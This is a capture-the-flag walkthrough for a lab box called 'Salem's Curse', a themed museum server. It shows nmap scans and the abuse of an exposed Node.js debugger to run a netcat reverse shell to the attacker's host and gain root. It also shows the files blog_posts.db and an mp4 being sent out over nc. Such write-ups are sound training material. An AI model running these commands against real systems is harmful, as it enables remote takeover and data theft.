# Salem's Curse #### **1. Footprinting:** ```shell ┌──(kali㉿kali)-[~] └─$ nmap -g53 -sS -T4 -p- -Pn -n --min-rate 4000 --disable-arp-ping salemmanor.hv Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 02:41 +07 Warning: 172.20.7.110 giving up on port because retransmission cap hit (6). Nmap scan report for salemmanor.hv (172.20.7.110) Host is up (0.16s latency). Not shown: 65182 closed tcp ports (reset), 350 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3000/tcp open ppp Nmap done: 1 IP address (1 host up) scanned in 36.93 seconds ┌──(kali㉿kali)-[~] └─$ nmap -g53 -sCV -p22,80,3000 -Pn -n --disable-arp-ping salemmanor.hv Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-05 02:42 +07 Nmap scan report for salemmanor.hv (172.20.7.110) Host is up (0.048s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 95:30:f3:df:a0:a0:f5:2c:cb:3a:f7:4a:7d:c4:62:d5 (RSA) | 256 21:d6:55:80:3b:05:0b:b6:f2:f3:0d:07:65:6a:87:41 (ECDSA) |_ 256 6b:5a:cd:21:7f:e0:a5:b2:96:02:18:13:56:db:8c:86 (ED25519) 80/tcp open http Node.js (Express middleware) |_http-title: Salem Manor Museum - Where History Haunts 3000/tcp open ppp? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, Help, Kerberos, NCP, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie: | HTTP/1.0 400 Bad Request | Content-Type: text/html; charset=UTF-8 |_ WebSockets request was expected 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port3000-TCP:V=7.95%I=7%D=11/5%Time=690A5728%P=x86_64-pc-linux-gnu%r(Ge SF:tRequest,65,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Type:\x20tex SF:t/html;\x20charset=UTF-8\r\n\r\nWebSockets\x20request\x20was\x20expecte SF:d\r\n")%r(Help,65,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Type:\ SF:x20text/html;\x20charset=UTF-8\r\n\r\nWebSockets\x20request\x20was\x20e SF:xpected\r\n")%r(NCP,65,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-T SF:ype:\x20text/html;\x20charset=UTF-8\r\n\r\nWebSockets\x20request\x20was SF:\x20expected\r\n")%r(HTTPOptions,65,"HTTP/1\.0\x20400\x20Bad\x20Request SF:\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\n\r\nWebSockets\x20r SF:equest\x20was\x20expected\r\n")%r(RTSPRequest,65,"HTTP/1\.0\x20400\x20B SF:ad\x20Request\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\n\r\nWe SF:bSockets\x20request\x20was\x20expected\r\n")%r(RPCCheck,65,"HTTP/1\.0\x SF:20400\x20Bad\x20Request\r\nContent-Type:\x20text/html;\x20charset=UTF-8 SF:\r\n\r\nWebSockets\x20request\x20was\x20expected\r\n")%r(DNSVersionBind SF:ReqTCP,65,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/ SF:html;\x20charset=UTF-8\r\n\r\nWebSockets\x20request\x20was\x20expected\ SF:r\n")%r(DNSStatusRequestTCP,65,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nC SF:ontent-Type:\x20text/html;\x20charset=UTF-8\r\n\r\nWebSockets\x20reques SF:t\x20was\x20expected\r\n")%r(SSLSessionReq,65,"HTTP/1\.0\x20400\x20Bad\ SF:x20Request\r\nContent-Type:\x20text/html;\x20charset=UTF-8\r\n\r\nWebSo SF:ckets\x20request\x20was\x20expected\r\n")%r(TerminalServerCookie,65,"HT SF:TP/1\.0\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/html;\x20char SF:set=UTF-8\r\n\r\nWebSockets\x20request\x20was\x20expected\r\n")%r(TLSSe SF:ssionReq,65,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Type:\x20tex SF:t/html;\x20charset=UTF-8\r\n\r\nWebSockets\x20request\x20was\x20expecte SF:d\r\n")%r(Kerberos,65,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Ty SF:pe:\x20text/html;\x20charset=UTF-8\r\n\r\nWebSockets\x20request\x20was\ SF:x20expected\r\n")%r(SMBProgNeg,65,"HTTP/1\.0\x20400\x20Bad\x20Request\r SF:\nContent-Type:\x20text/html;\x20charset=UTF-8\r\n\r\nWebSockets\x20req SF:uest\x20was\x20expected\r\n"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.05 seconds ``` #### **2. First Question:** This question could be answered by add the host #### **3. Second Question:** This could be solved by connecting to the debugger on port 3000: ```shell ┌──(kali㉿kali)-[~] └─$ node inspect 172.20.7.110:3000 connecting to 172.20.7.110:3000 ... ok debug> exec process.mainModule.require('child_process').execSync('nc -e /bin/bash 10.8.5.10 4444').toString() ``` **Setting up the `penelope` handler:** ```shell ┌──(kali㉿kali)-[~] └─$ penelope [+] Listening for reverse shells on 0.0.0.0:4444 → 127.0.0.1 • 192.168.1.9 • 192.168.2.129 • 172.17.0.1 • 10.8.5.10 ➤ 🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C) [+] Got reverse shell from salemmanormuseum~172.20.7.110-Linux-x86_64 😍 Assigned SessionID <1> [+] Attempting to upgrade shell to PTY... [+] Shell upgraded successfully using /usr/bin/python3! 💪 [+] Interacting with session [1], Shell Type: PTY, Menu key: F12 [+] Logging to /home/kali/.penelope/sessions/salemmanormuseum~172.20.7.110-Linux-x86_64/2025_11_05-04_04_37-537.log 📜 ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── root@salemmanormuseum:~/museum# whoami root root@salemmanormuseum:~/museum# ls -lah total 208K drwxr-xr-x 5 root root 4.0K Oct 26 06:38 . drwx------ 6 root root 4.0K Oct 26 08:26 .. -rw-r--r-- 1 root root 32K Oct 26 06:36 blog_posts.db -rw-r--r-- 1 root root 4.6K Oct 26 07:53 museum_app.js drwxr-xr-x 186 root root 4.0K Oct 23 09:49 node_modules -rw-r--r-- 1 root root 555 Oct 26 07:35 package.json -rw-r--r-- 1 root root 143K Oct 23 09:49 package-lock.json drwxr-xr-x 6 root root 4.0K Oct 24 10:39 public drwxr-xr-x 2 root root 4.0K Oct 24 09:13 views root@salemmanormuseum:~/museum# nc 10.8.5.10 9001 < blog_posts.db ``` #### **Open the `.db` on your Kali to answer the question** #### **4. The 3rd question:** ```shell root@salemmanormuseum:/home/crane/notes# cat discovery.txt GOT IT!!! Verified 3x - matches GPR anomaly perfectly 6 feet depth - deliberate burial Iron box, sealed 333 years ago UV analysis of Blackwood's letters revealed what's inside: His secret grimoire - handwritten manuscript "The Book of Binding and Breaking" Contains curse techniques AND counter-curses He hid the solution to his own work This changes everything --- Called archaeologist Excavation Monday --- Archive feels wrong Cold, lights flickering --- Something's wrong Temp dropping Not alone --- I can feel his presence He's here Standing in the doorway Watching me 42.XXX,-70.XXX # The answer Someone find root@salemmanormuseum:/home/crane/notes# ``` #### **5. The last question:** ```shell root@salemmanormuseum:~/museum# cd /mnt root@salemmanormuseum:/mnt# ls -lah total 12K drwxr-xr-x 3 root root 4.0K Jan 1 1970 . drwxr-xr-x 18 root root 4.0K Dec 27 2024 .. drwxr-xr-x 2 root root 4.0K Jan 1 1970 camera_recordings root@salemmanormuseum:/mnt# cd camera_recordings/ root@salemmanormuseum:/mnt/camera_recordings# ls -lah total 2.1M drwxr-xr-x 2 root root 4.0K Jan 1 1970 . drwxr-xr-x 3 root root 4.0K Jan 1 1970 .. -rw-r--r-- 1 root root 2.1M Jan 1 1970 archive_cam01_incident.mp4 -rw-r--r-- 1 root root 1.3K Jan 1 1970 archive_room_cam01_20251025.log -rw-r--r-- 1 root root 750 Jan 1 1970 camera-2025-10-25_segment3.timeline -rw-r--r-- 1 root root 950 Jan 1 1970 temperature_sensors_20251025.log root@salemmanormuseum:/mnt/camera_recordings# cat camera-2025-10-25_segment3.timeline SECURITY CAMERA - INCIDENT FOOTAGE NOTES Camera: ARCHIVE-CAM-01 Date: October 25, 2025 Type: IR (Infrared) Recording ============================================================ SEQUENCE SUMMARY: Phase 1: Normal Activity - Subject working at desk - Typing, document examination - Standard behavior patterns Phase 2: Environmental Anomalies - Lighting begins to flicker - Subject appears uneasy - Temperature drop detected (external sensors) Phase 3: CRITICAL - IR Mode Engaged - Complete lighting failure - Camera switches to infrared automatically - Thermal signatures visible ANOMALY DETECTED: - Second thermal source appears in frame - Primary subject thermal signature vanishes - No door exit recorded - Secondary signature moves and exits root@salemmanormuseum:/mnt/camera_recordings# nc 10.8.5.10. 9001 < archive_cam01_incident.mp4 ``` #### **Open the video on our machine to answer the final question.**